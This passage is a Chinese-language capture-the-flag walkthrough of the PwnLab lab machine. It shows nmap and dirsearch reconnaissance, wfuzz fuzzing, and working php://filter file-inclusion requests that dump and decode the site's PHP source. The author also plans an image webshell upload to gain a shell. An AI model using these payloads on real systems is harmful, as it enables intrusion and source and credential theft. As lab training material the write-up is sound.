信息收集

注:少见的一台可以使用 VMware Workstation 直接打开的靶机。

  • 首先查看 Kali IP 地址:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
root at kali in /pwnlab
$ ip --color address
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host noprefixroute 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:64:21:cc brd ff:ff:ff:ff:ff:ff
    inet 10.10.8.21/24 brd 10.10.8.255 scope global dynamic noprefixroute eth0
       valid_lft 1732sec preferred_lft 1732sec
    inet6 fe80::24ad:8964:fd1d:7210/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever

地址探测

  • 使用 Nmap 扫描出一个 IP:10.10.8.143
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
root at kali in /pwnlab 
$ nmap -sn --min-rate 10000 10.10.8.0/24 -oN nmap_ip.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-27 16:26 CST
Nmap scan report for 10.10.8.1
Host is up (0.00025s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.8.2
Host is up (0.000077s latency).
MAC Address: 00:50:56:F2:17:CE (VMware)
Nmap scan report for 10.10.8.18
Host is up (0.0072s latency).
MAC Address: 00:0C:29:6D:8A:D0 (VMware)
Nmap scan report for 10.10.8.254
Host is up (0.000046s latency).
MAC Address: 00:50:56:E0:97:CA (VMware)
Nmap scan report for 10.10.8.21
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.51 seconds

端口扫描

  • 扫描开放端口:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
root at kali in /pwnlab 
$ nmap -p- -sC -T4 --min-rate 10000 10.10.8.18 -oN nmap_port.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-27 16:27 CST
Nmap scan report for 10.10.8.18
Host is up (0.00016s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE
80/tcp    open  http
|_http-title: PwnLab Intranet Image Hosting
111/tcp   open  rpcbind
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          36670/udp6  status
|   100024  1          39452/tcp   status
|   100024  1          51307/udp   status
|_  100024  1          55096/tcp6  status
3306/tcp  open  mysql
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.47-0+deb8u1
|   Thread ID: 37
|   Capabilities flags: 63487
|   Some Capabilities: IgnoreSigpipes, FoundRows, Support41Auth, LongColumnFlag, IgnoreSpaceBeforeParenthesis, ODBCClient, Speaks41ProtocolOld, SupportsCompression, Speaks41ProtocolNew, InteractiveClient, ConnectWithDatabase, SupportsTransactions, DontAllowDatabaseTableColumn, SupportsLoadDataLocal, LongPassword, SupportsMultipleStatments, SupportsMultipleResults, SupportsAuthPlugins
|   Status: Autocommit
|   Salt: V!@\0w*iSC4{3)q#SZJD
|_  Auth Plugin Name: mysql_native_password
39452/tcp open  status
MAC Address: 00:0C:29:6D:8A:D0 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 6.79 seconds

服务识别

  • 扫描端口对应服务:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
root at kali in /pwnlab 
$ nmap -p80,111,3306,39452 -sV -O -A -sC -T4 --min-rate 10000 10.10.8.18 -oN nmap_server.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-27 16:29 CST
Nmap scan report for 10.10.8.18
Host is up (0.00067s latency).

PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: PwnLab Intranet Image Hosting
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          36670/udp6  status
|   100024  1          39452/tcp   status
|   100024  1          51307/udp   status
|_  100024  1          55096/tcp6  status
3306/tcp  open  mysql   MySQL 5.5.47-0+deb8u1
39452/tcp open  status  1 (RPC #100024)
MAC Address: 00:0C:29:6D:8A:D0 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.67 ms 10.10.8.18

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.86 seconds

漏洞扫描

  • 使用 Nmap 进行漏洞扫描:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
root at kali in /pwnlab 
$ nmap --script=vuln -T4 --min-rate 10000 10.10.8.18 -oN nmap_vuln.txt
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-27 16:30 CST
Nmap scan report for 10.10.8.18
Host is up (0.00040s latency).                                                                                                                   
Not shown: 997 closed tcp ports (reset)                                                                                                          
PORT     STATE SERVICE                                                                                                                           
80/tcp   open  http
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.8.18
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://10.10.8.18:80/?page=login
|     Form id: user
|_    Form action: 
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-internal-ip-disclosure: 
|_  Internal IP Leaked: 127.0.0.1
| http-cookie-flags: 
|   /login.php: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-enum: 
|   /login.php: Possible admin folder
|   /images/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
|_  /upload/: Potentially interesting directory w/ listing on 'apache/2.4.10 (debian)'
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
111/tcp  open  rpcbind
3306/tcp open  mysql
MAC Address: 00:0C:29:6D:8A:D0 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 322.70 seconds
  • 看了下扫出来的漏洞,没一个有用的。

目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
root at kali in ~ 
$ dirsearch -u http://10.10.8.18 -o /pwnlab/dirsearch.txt

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /pwnlab/dirsearch.txt

Error Log: /root/.dirsearch/logs/errors-23-11-27_16-31-38.log

Target: http://10.10.8.18/

[16:31:38] Starting: 
[16:31:39] 403 -  296B  - /.ht_wsr.txt                                     
[16:31:39] 403 -  299B  - /.htaccess.bak1                                  
[16:31:39] 403 -  299B  - /.htaccess.orig
......

oot at kali in /pwnlab 
$ cat dirsearch.txt | grep 200
200     0B   http://10.10.8.18:80/config.php
200   939B   http://10.10.8.18:80/images/
200   332B   http://10.10.8.18:80/index.php
200   332B   http://10.10.8.18:80/index.php/login/
200   250B   http://10.10.8.18:80/login.php
200    19B   http://10.10.8.18:80/upload.php
200   739B   http://10.10.8.18:80/upload/

漏洞利用

  • 依次访问扫描出的内容,很明显这是一个自建的站点:

image-20231127163330938

  • 有一个登录页面(login.php),一个文件上传页面(upload.php),其中文件上传页面需要登录才可以上传:

image-20231127165509994

文件包含

  • 经过简单的查找,发现登录页面和上传页面的 URL 是这么写的:
1
http://10.10.8.18/?page=login
  • 传入的是什么值,就跳转到什么页面上,在这种请求上可能存在有以下几种漏洞:
    • 目录穿越
    • 文件包含
    • SQL 注入

Wfuzz

  • 不过概率大的还是文件包含,可以使用 Wfuzz 试一试;
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
root at kali in /usr/share/wordlists/wfuzz/general 
$ wfuzz -u "http://10.10.8.18/?page=FUZZ" -w /usr/share/wordlists/wfuzz/general/common.txt -f wfuzz.txt

********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.8.18/?page=FUZZ
Total requests: 951

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================
000000001:   200        11 L     28 W       265 Ch      "@"
000000048:   200        11 L     28 W       265 Ch      "admon"
000000031:   200        11 L     28 W       265 Ch      "action"
000000046:   200        11 L     28 W       265 Ch      "admin_logon"
000000007:   200        11 L     28 W       265 Ch      "10"
......
  • 根据结果来看,基本都是 11 L 的,使用 grep 排除一下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
root at kali in /usr/share/wordlists/wfuzz/general 
$ cat wfuzz.txt| grep -v "11 L"
Target: http://10.10.8.18/?page=FUZZ
Total requests: 951
==================================================================
ID    Response   Lines      Word         Chars          Request    
==================================================================
00489:  C=200     16 L        48 W          515 Ch        "login"
00862:  C=200      9 L        30 W          257 Ch        "upload"

Total time: 0
Processed Requests: 949
Filtered Requests: 0
Requests/sec.: 0
  • 突然发现,测错了,尴尬。

PHP 伪协议

  • 由于存在有文件包含,尝试包含 /etc/passwd 文件:
1
http://10.10.8.18/?page=/etc/passwd
  • 页面很明显的告诉我,没包含成功,尝试尝试伪协议:
    • file://
    • date://
    • php://input
    • php://filter

login.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
root at kali in /usr/share/wordlists/wfuzz/general 
$ curl "http://10.10.8.18/?page=php://filter/read=convert.base64-encode/resource=login"
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
PD9waHANCnNlc3Npb25fc3RhcnQoKTsNCnJlcXVpcmUoImNvbmZpZy5waHAiKTsNCiRteXNxbGkgPSBuZXcgbXlzcWxpKCRzZXJ2ZXIsICR1c2VybmFtZSwgJHBhc3N3b3JkLCAkZGF0YWJhc2UpOw0KDQppZiAoaXNzZXQoJF9QT1NUWyd1c2VyJ10pIGFuZCBpc3NldCgkX1BPU1RbJ3Bhc3MnXSkpDQp7DQoJJGx1c2VyID0gJF9QT1NUWyd1c2VyJ107DQoJJGxwYXNzID0gYmFzZTY0X2VuY29kZSgkX1BPU1RbJ3Bhc3MnXSk7DQoNCgkkc3RtdCA9ICRteXNxbGktPnByZXBhcmUoIlNFTEVDVCAqIEZST00gdXNlcnMgV0hFUkUgdXNlcj0/IEFORCBwYXNzPT8iKTsNCgkkc3RtdC0+YmluZF9wYXJhbSgnc3MnLCAkbHVzZXIsICRscGFzcyk7DQoNCgkkc3RtdC0+ZXhlY3V0ZSgpOw0KCSRzdG10LT5zdG9yZV9SZXN1bHQoKTsNCg0KCWlmICgkc3RtdC0+bnVtX3Jvd3MgPT0gMSkNCgl7DQoJCSRfU0VTU0lPTlsndXNlciddID0gJGx1c2VyOw0KCQloZWFkZXIoJ0xvY2F0aW9uOiA/cGFnZT11cGxvYWQnKTsNCgl9DQoJZWxzZQ0KCXsNCgkJZWNobyAiTG9naW4gZmFpbGVkLiI7DQoJfQ0KfQ0KZWxzZQ0Kew0KCT8+DQoJPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0iUE9TVCI+DQoJPGxhYmVsPlVzZXJuYW1lOiA8L2xhYmVsPjxpbnB1dCBpZD0idXNlciIgdHlwZT0idGVzdCIgbmFtZT0idXNlciI+PGJyIC8+DQoJPGxhYmVsPlBhc3N3b3JkOiA8L2xhYmVsPjxpbnB1dCBpZD0icGFzcyIgdHlwZT0icGFzc3dvcmQiIG5hbWU9InBhc3MiPjxiciAvPg0KCTxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9InN1Ym1pdCIgdmFsdWU9IkxvZ2luIj4NCgk8L2Zvcm0+DQoJPD9waHANCn0NCg==</center>
</body>
</html>
  • 经测试,可以使用 php://filter 进行文件读取,解码一下:
1
2
root at kali in /usr/share/wordlists/wfuzz/general 
$ echo PD9waHANCnNlc3Npb25fc3RhcnQoKTsNCnJlcXVpcmUoImNvbmZpZy5waHAiKTsNCiRteXNxbGkgPSBuZXcgbXlzcWxpKCRzZXJ2ZXIsICR1c2VybmFtZSwgJHBhc3N3b3JkLCAkZGF0YWJhc2UpOw0KDQppZiAoaXNzZXQoJF9QT1NUWyd1c2VyJ10pIGFuZCBpc3NldCgkX1BPU1RbJ3Bhc3MnXSkpDQp7DQoJJGx1c2VyID0gJF9QT1NUWyd1c2VyJ107DQoJJGxwYXNzID0gYmFzZTY0X2VuY29kZSgkX1BPU1RbJ3Bhc3MnXSk7DQoNCgkkc3RtdCA9ICRteXNxbGktPnByZXBhcmUoIlNFTEVDVCAqIEZST00gdXNlcnMgV0hFUkUgdXNlcj0/IEFORCBwYXNzPT8iKTsNCgkkc3RtdC0+YmluZF9wYXJhbSgnc3MnLCAkbHVzZXIsICRscGFzcyk7DQoNCgkkc3RtdC0+ZXhlY3V0ZSgpOw0KCSRzdG10LT5zdG9yZV9SZXN1bHQoKTsNCg0KCWlmICgkc3RtdC0+bnVtX3Jvd3MgPT0gMSkNCgl7DQoJCSRfU0VTU0lPTlsndXNlciddID0gJGx1c2VyOw0KCQloZWFkZXIoJ0xvY2F0aW9uOiA/cGFnZT11cGxvYWQnKTsNCgl9DQoJZWxzZQ0KCXsNCgkJZWNobyAiTG9naW4gZmFpbGVkLiI7DQoJfQ0KfQ0KZWxzZQ0Kew0KCT8+DQoJPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0iUE9TVCI+DQoJPGxhYmVsPlVzZXJuYW1lOiA8L2xhYmVsPjxpbnB1dCBpZD0idXNlciIgdHlwZT0idGVzdCIgbmFtZT0idXNlciI+PGJyIC8+DQoJPGxhYmVsPlBhc3N3b3JkOiA8L2xhYmVsPjxpbnB1dCBpZD0icGFzcyIgdHlwZT0icGFzc3dvcmQiIG5hbWU9InBhc3MiPjxiciAvPg0KCTxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9InN1Ym1pdCIgdmFsdWU9IkxvZ2luIj4NCgk8L2Zvcm0+DQoJPD9waHANCn0NCg== | base64 -d > login.php
  • login 页面的内容如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
<?php
session_start();
require("config.php");
$mysqli = new mysqli($server, $username, $password, $database);

if (isset($_POST['user']) and isset($_POST['pass']))
{
        $luser = $_POST['user'];
        $lpass = base64_encode($_POST['pass']);

        $stmt = $mysqli->prepare("SELECT * FROM users WHERE user=? AND pass=?");
        $stmt->bind_param('ss', $luser, $lpass);

        $stmt->execute();
        $stmt->store_Result();

        if ($stmt->num_rows == 1)
        {
                $_SESSION['user'] = $luser;
                header('Location: ?page=upload');
        }
        else
        {
                echo "Login failed.";
        }
}
else
{
        ?>
        <form action="" method="POST">
        <label>Username: </label><input id="user" type="test" name="user"><br />
        <label>Password: </label><input id="pass" type="password" name="pass"><br />
        <input type="submit" name="submit" value="Login">
        </form>
        <?php
}
  • 一个简单的登录页面。

upload.php

  • 再看看 upload 的:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
root at kali in /usr/share/wordlists/wfuzz/general 
$ curl "http://10.10.8.18/?page=php://filter/read=convert.base64-encode/resource=upload"
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
PD9waHANCnNlc3Npb25fc3RhcnQoKTsNCmlmICghaXNzZXQoJF9TRVNTSU9OWyd1c2VyJ10pKSB7IGRpZSgnWW91IG11c3QgYmUgbG9nIGluLicpOyB9DQo/Pg0KPGh0bWw+DQoJPGJvZHk+DQoJCTxmb3JtIGFjdGlvbj0nJyBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnPg0KCQkJPGlucHV0IHR5cGU9J2ZpbGUnIG5hbWU9J2ZpbGUnIGlkPSdmaWxlJyAvPg0KCQkJPGlucHV0IHR5cGU9J3N1Ym1pdCcgbmFtZT0nc3VibWl0JyB2YWx1ZT0nVXBsb2FkJy8+DQoJCTwvZm9ybT4NCgk8L2JvZHk+DQo8L2h0bWw+DQo8P3BocCANCmlmKGlzc2V0KCRfUE9TVFsnc3VibWl0J10pKSB7DQoJaWYgKCRfRklMRVNbJ2ZpbGUnXVsnZXJyb3InXSA8PSAwKSB7DQoJCSRmaWxlbmFtZSAgPSAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXTsNCgkJJGZpbGV0eXBlICA9ICRfRklMRVNbJ2ZpbGUnXVsndHlwZSddOw0KCQkkdXBsb2FkZGlyID0gJ3VwbG9hZC8nOw0KCQkkZmlsZV9leHQgID0gc3RycmNocigkZmlsZW5hbWUsICcuJyk7DQoJCSRpbWFnZWluZm8gPSBnZXRpbWFnZXNpemUoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddKTsNCgkJJHdoaXRlbGlzdCA9IGFycmF5KCIuanBnIiwiLmpwZWciLCIuZ2lmIiwiLnBuZyIpOyANCg0KCQlpZiAoIShpbl9hcnJheSgkZmlsZV9leHQsICR3aGl0ZWxpc3QpKSkgew0KCQkJZGllKCdOb3QgYWxsb3dlZCBleHRlbnNpb24sIHBsZWFzZSB1cGxvYWQgaW1hZ2VzIG9ubHkuJyk7DQoJCX0NCg0KCQlpZihzdHJwb3MoJGZpbGV0eXBlLCdpbWFnZScpID09PSBmYWxzZSkgew0KCQkJZGllKCdFcnJvciAwMDEnKTsNCgkJfQ0KDQoJCWlmKCRpbWFnZWluZm9bJ21pbWUnXSAhPSAnaW1hZ2UvZ2lmJyAmJiAkaW1hZ2VpbmZvWydtaW1lJ10gIT0gJ2ltYWdlL2pwZWcnICYmICRpbWFnZWluZm9bJ21pbWUnXSAhPSAnaW1hZ2UvanBnJyYmICRpbWFnZWluZm9bJ21pbWUnXSAhPSAnaW1hZ2UvcG5nJykgew0KCQkJZGllKCdFcnJvciAwMDInKTsNCgkJfQ0KDQoJCWlmKHN1YnN0cl9jb3VudCgkZmlsZXR5cGUsICcvJyk+MSl7DQoJCQlkaWUoJ0Vycm9yIDAwMycpOw0KCQl9DQoNCgkJJHVwbG9hZGZpbGUgPSAkdXBsb2FkZGlyIC4gbWQ1KGJhc2VuYW1lKCRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkuJGZpbGVfZXh0Ow0KDQoJCWlmIChtb3ZlX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkdXBsb2FkZmlsZSkpIHsNCgkJCWVjaG8gIjxpbWcgc3JjPVwiIi4kdXBsb2FkZmlsZS4iXCI+PGJyIC8+IjsNCgkJfSBlbHNlIHsNCgkJCWRpZSgnRXJyb3IgNCcpOw0KCQl9DQoJfQ0KfQ0KDQo/Pg==</center>
</body>
</html>
  • 解码:
1
2
root at kali in /usr/share/wordlists/wfuzz/general 
$ echo PD9waHANCnNlc3Npb25fc3RhcnQoKTsNCmlmICghaXNzZXQoJF9TRVNTSU9OWyd1c2VyJ10pKSB7IGRpZSgnWW91IG11c3QgYmUgbG9nIGluLicpOyB9DQo/Pg0KPGh0bWw+DQoJPGJvZHk+DQoJCTxmb3JtIGFjdGlvbj0nJyBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnPg0KCQkJPGlucHV0IHR5cGU9J2ZpbGUnIG5hbWU9J2ZpbGUnIGlkPSdmaWxlJyAvPg0KCQkJPGlucHV0IHR5cGU9J3N1Ym1pdCcgbmFtZT0nc3VibWl0JyB2YWx1ZT0nVXBsb2FkJy8+DQoJCTwvZm9ybT4NCgk8L2JvZHk+DQo8L2h0bWw+DQo8P3BocCANCmlmKGlzc2V0KCRfUE9TVFsnc3VibWl0J10pKSB7DQoJaWYgKCRfRklMRVNbJ2ZpbGUnXVsnZXJyb3InXSA8PSAwKSB7DQoJCSRmaWxlbmFtZSAgPSAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXTsNCgkJJGZpbGV0eXBlICA9ICRfRklMRVNbJ2ZpbGUnXVsndHlwZSddOw0KCQkkdXBsb2FkZGlyID0gJ3VwbG9hZC8nOw0KCQkkZmlsZV9leHQgID0gc3RycmNocigkZmlsZW5hbWUsICcuJyk7DQoJCSRpbWFnZWluZm8gPSBnZXRpbWFnZXNpemUoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddKTsNCgkJJHdoaXRlbGlzdCA9IGFycmF5KCIuanBnIiwiLmpwZWciLCIuZ2lmIiwiLnBuZyIpOyANCg0KCQlpZiAoIShpbl9hcnJheSgkZmlsZV9leHQsICR3aGl0ZWxpc3QpKSkgew0KCQkJZGllKCdOb3QgYWxsb3dlZCBleHRlbnNpb24sIHBsZWFzZSB1cGxvYWQgaW1hZ2VzIG9ubHkuJyk7DQoJCX0NCg0KCQlpZihzdHJwb3MoJGZpbGV0eXBlLCdpbWFnZScpID09PSBmYWxzZSkgew0KCQkJZGllKCdFcnJvciAwMDEnKTsNCgkJfQ0KDQoJCWlmKCRpbWFnZWluZm9bJ21pbWUnXSAhPSAnaW1hZ2UvZ2lmJyAmJiAkaW1hZ2VpbmZvWydtaW1lJ10gIT0gJ2ltYWdlL2pwZWcnICYmICRpbWFnZWluZm9bJ21pbWUnXSAhPSAnaW1hZ2UvanBnJyYmICRpbWFnZWluZm9bJ21pbWUnXSAhPSAnaW1hZ2UvcG5nJykgew0KCQkJZGllKCdFcnJvciAwMDInKTsNCgkJfQ0KDQoJCWlmKHN1YnN0cl9jb3VudCgkZmlsZXR5cGUsICcvJyk+MSl7DQoJCQlkaWUoJ0Vycm9yIDAwMycpOw0KCQl9DQoNCgkJJHVwbG9hZGZpbGUgPSAkdXBsb2FkZGlyIC4gbWQ1KGJhc2VuYW1lKCRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkuJGZpbGVfZXh0Ow0KDQoJCWlmIChtb3ZlX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkdXBsb2FkZmlsZSkpIHsNCgkJCWVjaG8gIjxpbWcgc3JjPVwiIi4kdXBsb2FkZmlsZS4iXCI+PGJyIC8+IjsNCgkJfSBlbHNlIHsNCgkJCWRpZSgnRXJyb3IgNCcpOw0KCQl9DQoJfQ0KfQ0KDQo/Pg== | base64 -d > upload.php
  • upload 页面内容如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
<?php
session_start();
if (!isset($_SESSION['user'])) { die('You must be log in.'); }
?>
<html>
        <body>
                <form action='' method='post' enctype='multipart/form-data'>
                        <input type='file' name='file' id='file' />
                        <input type='submit' name='submit' value='Upload'/>
                </form>
        </body>
</html>
<?php 
if(isset($_POST['submit'])) {
        if ($_FILES['file']['error'] <= 0) {
                $filename  = $_FILES['file']['name'];
                $filetype  = $_FILES['file']['type'];
                $uploaddir = 'upload/';
                $file_ext  = strrchr($filename, '.');
                $imageinfo = getimagesize($_FILES['file']['tmp_name']);
                $whitelist = array(".jpg",".jpeg",".gif",".png"); 

                if (!(in_array($file_ext, $whitelist))) {
                        die('Not allowed extension, please upload images only.');
                }

                if(strpos($filetype,'image') === false) {
                        die('Error 001');
                }

                if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {
                        die('Error 002');
                }

                if(substr_count($filetype, '/')>1){
                        die('Error 003');
                }

                $uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;

                if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
                        echo "<img src=\"".$uploadfile."\"><br />";
                } else {
                        die('Error 4');
                }
        }
}

?>
  • 也是一个简简单单的文件上传页面,要写个图片马进行上传,然后再进行文件包含 GetShell。
  • 嗯,很棒,但是现在还没找到有关账号密码的信息。
  • 不过,之前我们再进行目录扫描时,还扫到了两个文件:
    • index.php
    • config.php

index.php

  • 看看 index 的:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
root at kali in /usr/share/wordlists/wfuzz/general 
$ curl "http://10.10.8.18/?page=php://filter/read=convert.base64-encode/resource=index"    
<html>
<head>
<title>PwnLab Intranet Image Hosting</title>
</head>
<body>
<center>
<img src="images/pwnlab.png"><br />
[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]
<hr/><br/>
PD9waHANCi8vTXVsdGlsaW5ndWFsLiBOb3QgaW1wbGVtZW50ZWQgeWV0Lg0KLy9zZXRjb29raWUoImxhbmciLCJlbi5sYW5nLnBocCIpOw0KaWYgKGlzc2V0KCRfQ09PS0lFWydsYW5nJ10pKQ0Kew0KCWluY2x1ZGUoImxhbmcvIi4kX0NPT0tJRVsnbGFuZyddKTsNCn0NCi8vIE5vdCBpbXBsZW1lbnRlZCB5ZXQuDQo/Pg0KPGh0bWw+DQo8aGVhZD4NCjx0aXRsZT5Qd25MYWIgSW50cmFuZXQgSW1hZ2UgSG9zdGluZzwvdGl0bGU+DQo8L2hlYWQ+DQo8Ym9keT4NCjxjZW50ZXI+DQo8aW1nIHNyYz0iaW1hZ2VzL3B3bmxhYi5wbmciPjxiciAvPg0KWyA8YSBocmVmPSIvIj5Ib21lPC9hPiBdIFsgPGEgaHJlZj0iP3BhZ2U9bG9naW4iPkxvZ2luPC9hPiBdIFsgPGEgaHJlZj0iP3BhZ2U9dXBsb2FkIj5VcGxvYWQ8L2E+IF0NCjxoci8+PGJyLz4NCjw/cGhwDQoJaWYgKGlzc2V0KCRfR0VUWydwYWdlJ10pKQ0KCXsNCgkJaW5jbHVkZSgkX0dFVFsncGFnZSddLiIucGhwIik7DQoJfQ0KCWVsc2UNCgl7DQoJCWVjaG8gIlVzZSB0aGlzIHNlcnZlciB0byB1cGxvYWQgYW5kIHNoYXJlIGltYWdlIGZpbGVzIGluc2lkZSB0aGUgaW50cmFuZXQiOw0KCX0NCj8+DQo8L2NlbnRlcj4NCjwvYm9keT4NCjwvaHRtbD4=</center>
</body>
</html>
  • 解码:
1
2
root at kali in /usr/share/wordlists/wfuzz/general 
$ echo PD9waHANCi8vTXVsdGlsaW5ndWFsLiBOb3QgaW1wbGVtZW50ZWQgeWV0Lg0KLy9zZXRjb29raWUoImxhbmciLCJlbi5sYW5nLnBocCIpOw0KaWYgKGlzc2V0KCRfQ09PS0lFWydsYW5nJ10pKQ0Kew0KCWluY2x1ZGUoImxhbmcvIi4kX0NPT0tJRVsnbGFuZyddKTsNCn0NCi8vIE5vdCBpbXBsZW1lbnRlZCB5ZXQuDQo/Pg0KPGh0bWw+DQo8aGVhZD4NCjx0aXRsZT5Qd25MYWIgSW50cmFuZXQgSW1hZ2UgSG9zdGluZzwvdGl0bGU+DQo8L2hlYWQ+DQo8Ym9keT4NCjxjZW50ZXI+DQo8aW1nIHNyYz0iaW1hZ2VzL3B3bmxhYi5wbmciPjxiciAvPg0KWyA8YSBocmVmPSIvIj5Ib21lPC9hPiBdIFsgPGEgaHJlZj0iP3BhZ2U9bG9naW4iPkxvZ2luPC9hPiBdIFsgPGEgaHJlZj0iP3BhZ2U9dXBsb2FkIj5VcGxvYWQ8L2E+IF0NCjxoci8+PGJyLz4NCjw/cGhwDQoJaWYgKGlzc2V0KCRfR0VUWydwYWdlJ10pKQ0KCXsNCgkJaW5jbHVkZSgkX0dFVFsncGFnZSddLiIucGhwIik7DQoJfQ0KCWVsc2UNCgl7DQoJCWVjaG8gIlVzZSB0aGlzIHNlcnZlciB0byB1cGxvYWQgYW5kIHNoYXJlIGltYWdlIGZpbGVzIGluc2lkZSB0aGUgaW50cmFuZXQiOw0KCX0NCj8+DQo8L2NlbnRlcj4NCjwvYm9keT4NCjwvaHRtbD4= | base64 -d > index.php
  • index 页面内容如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
<?php
//Multilingual. Not implemented yet.
//setcookie("lang","en.lang.php");
if (isset($_COOKIE['lang']))
{
        include("lang/".$_COOKIE['lang']);
}
